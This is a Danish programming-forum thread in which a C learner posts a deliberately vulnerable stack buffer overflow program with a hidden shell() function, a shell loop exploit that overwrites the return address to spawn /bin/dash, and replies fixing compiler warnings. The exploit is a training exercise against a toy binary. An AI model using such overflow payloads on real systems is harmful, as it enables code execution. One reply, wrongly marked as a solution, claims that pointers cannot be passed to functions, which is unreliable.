Peter Kruse Mester
13. august 2019 - 09:18 Der er 4 kommentarer og
2 løsninger

Nogen som kender fejlen her.

Hej alle kloge mennesker.

Nogen som kender denne fejl, mit program vil ikke compile på linux eller windows (subsystem). Er pt igang med at lære "C" og har kodet et lille buffer overflow program til test ONLY.

[B]CODE:[/B]

#include <stdio.h>
#include <string.h>

#define SIZE 500

void shell(){
    system("/bin/dash");
}

void functionCp(char *str){
    char buffer[SIZE];
    strcpy(buffer,str);
}

void main(int argc, char *argv[]){
    functionCp(argv[1]);
    printf("%s\n","EXECUTED NORMAL");
}




[B]PYTHON CODE - EXPLOIT[/B]

while true
do
    ./vuln $(python3 -c "print('A' * 511 + '\xb9\x11\x40\x00')")
done


[BKender godt til kodning[/B]

Jeg har ikke den store viden indenfor C sproget og håber derfor nogen vil hjælpe :D
13. august 2019 - 10:21 #1
mig bekendt, kan du ikke sende pointer (*) som argument til en procedure
du skriver *str. det dutter vist ikke.

du skriver
strcpy(buffer,str);

men du har sendt *str ind i proceduren.
det dur ikke, den forventer str
Peter Kruse Mester
13. august 2019 - 10:52 #2
Prøver lige at rette det til, som du skriver
Peter Kruse Mester
13. august 2019 - 10:52 #3
Indtil videre er dit svar løsningen :D
arne_v Ekspert
13. august 2019 - 23:43 #4
Nu skriver du jo ikke hvilke fejl du fik.

gcc -Wall gav mig:

vuln.c: In function 'shell':
vuln.c:7:5: warning: implicit declaration of function 'system' [-Wimplicit-function-declaration]
    7 |    system("/bin/dash");
      |    ^~~~~~
vuln.c: At top level:
vuln.c:15:6: warning: return type of 'main' is not 'int' [-Wmain]
  15 | void main(int argc, char *argv[]){
      |      ^~~~

og for at slippe af med dem maate jeg anerde til:


#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define SIZE 500

void shell(){
    system("/bin/dash");
}

void functionCp(char *str){
    char buffer[SIZE];
    strcpy(buffer,str);
}

int main(int argc, char *argv[]){
    functionCp(argv[1]);
    printf("%s\n","EXECUTED NORMAL");
    return 0;
}
arne_v Ekspert
13. august 2019 - 23:45 #5
Jeg kan ikke umiddelbart se noget galt med brugen af str.

C har et sjovt syn paa array og pointere, men det er som det er.
Peter Kruse Mester
14. august 2019 - 07:34 #6
Kodning er altid på tværs, men jeg prøver at blove bedre. Tak for de mange løsninger
Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links

Opret Preview

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Du kan også logge ind via nedenstående tjenester





Premium
IBM fortsætter offensiv opkøbsstrategi: Køber en af de største og ældste multicloud-leverandører i USA
IBM opkøber cloud-virksomheden MSP Taos. Det er blot det seneste opkøb fra IBM i jagten på de store cloud-giganter og falder i tråd med IBM's offensive hybrid cloud-strategi.
Computerworld
Verdens tredjestørste smartphone-producent blacklistes af Trump-administrationen
Smartphoneproducenten Xiaomi er blandt de ni nytilkomne på Trump-administrationens sorte liste over kinesiske virksomheder, som amerikanerne ikke længere må investere i.
CIO
Podcast: Hos Viking Life-Saving Equipment er it gået fra at være backend til at være noget, som kunderne spørger aktivt efter
Podcast, The Digital Edge: Viking leverer en stadig større del af deres produkt som en tjeneste. Som en del af tjenesten tager Viking ansvar for sikkerheden ved at levere, dokumentere og vedligeholde det nødvendige sikkerhedsudstyr. Hør hvordan Henrik Balslev senior digital director hos Viking har løftet den opgave.
Job & Karriere
Microsoft i kæmpe dansk satsning - åbner tre store datacentre i Danmark
Microsoft lancerer kæmpe satsning fra hovedkvarteret i Lyngby. Selskabet åbner tre store bæredygtige datacentre på Sjælland.
White paper
Her skal du passe på: Rapport fra cyberkrigens frontlinje
I 2020 blev cyberangreb hyppigere og stadig mere alvorlige, og i CrowdStrike Services Cyber Front Lines Report 2020 har du læse, hvor udfordringerne er størst. Rapporten dokumenterer blandt andet, at 63 pct. af alle angreb var økonomisk motiverede – og at hovedparten af angriberne benytter ransomware. Samtidigt bliver de afkrævede beløb større og større, og de kriminelle truer nu ikke kun med at slette data. Stadig oftere sker det, at de cyberkriminelle aktivt analyserer data og undersøger, om der kan sættes trumf på truslen ved true med at lække eller sælge følsomme informationer.